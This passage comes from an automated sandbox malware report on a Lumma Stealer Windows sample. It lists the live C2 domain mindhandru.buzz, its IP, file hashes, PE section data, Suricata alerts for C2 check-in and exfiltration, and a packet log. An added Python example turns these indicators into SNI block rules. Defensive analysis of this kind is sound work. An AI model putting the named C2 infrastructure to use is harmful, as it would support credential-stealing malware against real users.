  Source: AaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001063000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://ac.ecosia.org/autocomplete?q=
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz/Y
  Source: AaEBZ7icLd.exe, 00000000.00000003.2251208237.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2249900831.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2250351988.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

http://crl.microsoft&
  Source: AaEBZ7icLd.exe, 00000000.00000003.2343494094.00000000010CF000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: safe  Reputation: unknown

https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
  Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
  Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

http://x1.c.lencr.org/0
  Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

http://x1.i.lencr.org/0
  Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

http://crt.rootca1.amazontrust.com/rootca1.cer0?
  Source: AaEBZ7icLd.exe, 00000000.00000003.2250980470.000000000584D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
  Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
  Source: AaEBZ7icLd.exe, 00000000.00000003.2252226211.000000000110C000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://mindhandru.buzz/P
  Source: AaEBZ7icLd.exe, 00000000.00000002.2353089442.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2319423730.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2343601449.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2343643486.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2318964412.00000000010EF000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false  Antivirus detection: Avira URL Cloud: malware  Reputation: unknown

https://support.mozilla.org/products/firefoxgro.all
  Source: AaEBZ7icLd.exe, 00000000.00000003.2251961304.000000000593E000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high

https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
  Source: AaEBZ7icLd.exe, 00000000.00000003.2198262926.000000000584C000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198518483.0000000005849000.00000004.00000800.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2198358476.0000000005849000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false  Reputation: high
IP / Domain / Country / ASN / ASN Name / Malicious:
172.67.165.185  mindhandru.buzz  United States  13335  CLOUDFLARENETUS  Malicious: false
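Two things in the network tables above matter when turning them into indicators. The URL strings were recovered from memory dumps, so several carry bytes that are not part of the real request ("/apiwa2C6", "/piP", "crl.microsoft&"), and an exact-URL indicator built from them would never match live traffic. The single contacted IP, 172.67.165.185, sits in Cloudflare's AS13335, address space shared with unrelated sites, so it is a poor blocking key. Indicators are therefore better keyed by hostname. The Python below is an added example and not part of the Joe Sandbox report: it normalises the recovered strings to hosts, separates the C2 host and the other .buzz domains the report lists from certificate-revocation and browser-default noise, lists the paths seen for the C2 host, and renders one Suricata TLS-SNI rule per host. The input strings and domains are copied from the tables above; the noise list, the SID range and the rule message are assumptions.

```python
"""Host-level indicators from URL strings recovered from process memory.

Added example, not part of the Joe Sandbox report. The strings and domains
below are copied from the report's URL and domain tables; the noise list,
the SID range and the rule message are the author's assumptions.
"""
from urllib.parse import urlsplit

# Hosts the report lists as contacted or alongside the C2 (all from the page).
CONFIG_DOMAINS = {
    "mindhandru.buzz", "scentniej.buzz", "rebuildeso.buzz", "appliacnesot.buzz",
    "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz",
    "prisonyfork.buzz", "hummskitnj.buzz",
}

# Assumed: infrastructure any TLS client or browser-profile reader touches,
# expected in memory regardless of the malware's own traffic.
NOISE_DOMAINS = (
    "lencr.org", "amazontrust.com", "crl.microsoft", "duckduckgo.com",
    "google.com", "ecosia.org", "yahoo.com", "mozilla.org", "mozilla.com",
    "admarketplace.net", "ap01.net", "mt48.net", "bestbuy.com", "amazon.com",
)

# Strings as they appear in the report's URL table. Characters after the real
# path ("apiwa2C6", "piP", the "&" after crl.microsoft) are adjacent memory
# bytes, so exact-URL indicators built from them would not match live traffic.
MEMORY_STRINGS = [
    "https://mindhandru.buzz:443/apil",
    "https://mindhandru.buzz/apiwa2C6",
    "https://mindhandru.buzz/s",
    "https://mindhandru.buzz/gaBC8",
    "http://crl.microsoft&",
    "https://mindhandru.buzz/ms",
    "https://mindhandru.buzz/piP",
    "https://mindhandru.buzz/P",
    "https://mindhandru.buzz/Y",
    "https://mindhandru.buzz/api",
    "https://duckduckgo.com/chrome_newtab",
    "http://x1.c.lencr.org/0",
    "http://crl.rootca1.amazontrust.com/rootca1.crl0",
    "https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477",
]


def host_of(url):
    """Lowercase hostname of a possibly truncated or over-read URL string."""
    host = urlsplit(url.strip()).hostname or ""
    # keep only characters that can occur in a hostname
    host = "".join(ch for ch in host if ch.isalnum() or ch in ".-")
    return host.strip(".-")


def _under(host, domain):
    return host == domain or host.endswith("." + domain)


def classify(urls):
    """Split recovered URLs into C2 hosts, known noise and hosts to review."""
    buckets = {"c2": set(), "noise": set(), "unknown": set()}
    for url in urls:
        host = host_of(url)
        if not host:
            continue
        if any(_under(host, d) for d in CONFIG_DOMAINS):
            buckets["c2"].add(host)
        elif any(_under(host, d) for d in NOISE_DOMAINS):
            buckets["noise"].add(host)
        else:
            buckets["unknown"].add(host)
    return {k: sorted(v) for k, v in buckets.items()}


def paths_for(urls, host):
    """Distinct paths seen for one host; shows how noisy the memory strings are."""
    return sorted({urlsplit(u).path for u in urls if host_of(u) == host})


def blocklist(urls):
    """Listed domains plus any C2 host seen in memory, deduplicated."""
    return sorted(CONFIG_DOMAINS | set(classify(urls)["c2"]))


def suricata_sni_rules(hosts, sid_start=9000001):
    """One TLS SNI alert per host (sid_start is an assumed private range).
    Hosts are matched rather than the Cloudflare IP, which is shared."""
    return [
        f'alert tls any any -> any any (msg:"LummaC C2 SNI {h}"; tls.sni; '
        f'content:"{h}"; nocase; endswith; sid:{sid_start + i}; rev:1;)'
        for i, h in enumerate(sorted(hosts))
    ]


if __name__ == "__main__":
    result = classify(MEMORY_STRINGS)
    print("C2 hosts:", result["c2"])
    print("noise:", result["noise"])
    print("paths for mindhandru.buzz:", paths_for(MEMORY_STRINGS, "mindhandru.buzz"))
    for rule in suricata_sni_rules(blocklist(MEMORY_STRINGS)):
        print(rule)
```

Anything that lands in the "unknown" bucket is what an analyst should look at by hand; on the report's own strings that bucket is empty, the only C2 host in memory is mindhandru.buzz, and nine of its recovered paths collapse to the one clean endpoint "/api".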
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1581237
                                                                                            Start date and time:2024-12-27 08:58:08 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 5m 27s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:AaEBZ7icLd.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:52135372423d0e2a9e1a9c11c188df25.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                            EGA Information:Failed
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 0
                                                                                            • Number of non-executed functions: 0
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 40.126.53.17, 104.208.16.94, 13.107.246.63, 52.149.20.212
                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target AaEBZ7icLd.exe, PID 5632 because there are no executed function
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:59:11 | API Interceptor | 8x Sleep call for process: AaEBZ7icLd.exe modified
Match: 172.67.165.185
Associated Sample Name / URL | Detection | Threat Name | Context
cFLK1CiiNK.exe | malicious | LummaC |
ZvHSpovhDw.exe | malicious | LummaC |
PH1D3KHmOD.exe | malicious | LummaC |
7jKx8dPOEs.exe | malicious | LummaC |
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc |
zi042476Iv.exe | malicious | LummaC |
U7TAniYFeK.exe | malicious | LummaC |
ZBbOXn0a3R.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc |
P0SJULJxI0.exe | malicious | LummaC |
r06aMlvVyM.exe | malicious | LummaC |
Match: mindhandru.buzz
Associated Sample Name / URL | Detection | Threat Name | Context
cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 172.67.165.185
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
ZvHSpovhDw.exe | malicious | LummaC | 104.21.11.101
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 104.21.11.101
ARoqFi68Nr.exe | malicious | LummaC | 104.21.11.101
DRWgoZo325.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar | 104.21.11.101
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.11.101
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
cFLK1CiiNK.exe | malicious | LummaC | 172.67.165.185
ZvHSpovhDw.exe | malicious | LummaC | 172.67.165.185
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 172.67.165.185
ARoqFi68Nr.exe | malicious | LummaC | 172.67.165.185
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 172.67.165.185
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 172.67.165.185
No context
No created / dropped files found

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949884913522183
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: AaEBZ7icLd.exe
File size: 1'883'648 bytes
MD5: 52135372423d0e2a9e1a9c11c188df25
SHA1: 6809f399ba1106c2761da024156ebd606febfe39
SHA256: ad7dbcf74d0a449e97d6e4c94ce91f2c0b02414ae40ebfd523bffaa00ce1e29f
SHA512: a04bf6c1d9de2c867812061c469143e1a830531b35b79d3e52e157c27956da0dddb6fe301377c0ce05edca993ddbb7ac6e4f34356a1a979e3db9d76bc71e426a
SSDEEP: 49152:Tsq1J8omtqRGb/UXhbWvXrtBo+IGKLBmjgLNp5E:Tsq111RMcbWvXrHo+IPOgpp5
TLSH: 9895337F2D92D4B2C5BEC037910F3C0DE860AD9601E12D7F2D99DBB651E369AE2714A0
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................`J...........@...........................J...........@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8a6000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F909CD000CAh
setl byte ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F909CD020C5h
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x52000 | 0x26400 | ce8dc481e3c4f9b015a71b14bde8164d | False | 0.9995787377450981 | data | 7.983643456292964 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x55000 | 0x2ae000 | 0x200 | ea1d0f70ac657ca34b560f6d6845c1b2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nyylnyuw | 0x303000 | 0x1a2000 | 0x1a1e00 | 87aa5134da9e3cbc02b7993d4c834da7 | False | 0.9946991614941669 | data | 7.9545802741870855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dppqrxbg | 0x4a5000 | 0x1000 | 0x400 | 13cb9687cf0d838ecaa60b98cc556312 | False | 0.771484375 | data | 6.099227998581096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a6000 | 0x3000 | 0x2200 | f9ac1f028d74351a011a4469e736be2d | False | 0.06525735294117647 | DOS executable (COM) | 0.7719994436700762 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T08:59:11.907933+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:12.671287+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:12.671287+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:13.895136+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:14.650892+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49713 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:14.650892+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49713 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:16.606177+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49714 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:19.060275+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:20.137751+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49716 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:21.643605+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49722 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:24.460638+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49728 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:27.045522+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49736 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:27.062550+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.5 | 49736 | 172.67.165.185 | 443 | TCP
2024-12-27T08:59:30.334772+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49742 | 172.67.165.185 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:59:10.506525040 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:10.506565094 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:10.506879091 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:10.519331932 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:10.519357920 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:11.907841921 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:11.907932997 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:11.910670996 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:11.910686970 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:11.910903931 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:11.955054045 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:11.955075026 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:11.955153942 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:12.671298027 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:12.671402931 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:12.671449900 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:12.673518896 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:12.673540115 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:12.673558950 CET | 49711 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:12.673563957 CET | 443 | 49711 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:12.681427956 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:12.681468010 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:12.681569099 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:12.681838989 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:12.681850910 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:13.894998074 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:13.895136118 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:13.896441936 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:13.896456003 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:13.896698952 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:13.898377895 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:13.898406029 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:13.898448944 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.650903940 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.650949955 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.650994062 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.651017904 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.651046038 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.651094913 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.651102066 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.659291029 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.659356117 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.659450054 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.659461021 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.659518957 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.670706034 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.678889036 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.679068089 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.679080009 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.725301027 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.770500898 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.819179058 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.819217920 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.843043089 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.843101978 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.843127966 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.846715927 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.846775055 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.846879005 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.846903086 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:14.846925974 CET | 49713 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:14.846931934 CET | 443 | 49713 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:15.103595972 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:15.103634119 CET | 443 | 49714 | 172.67.165.185 | 192.168.2.5
Dec 27, 2024 08:59:15.103718042 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
Dec 27, 2024 08:59:15.104032993 CET | 49714 | 443 | 192.168.2.5 | 172.67.165.185
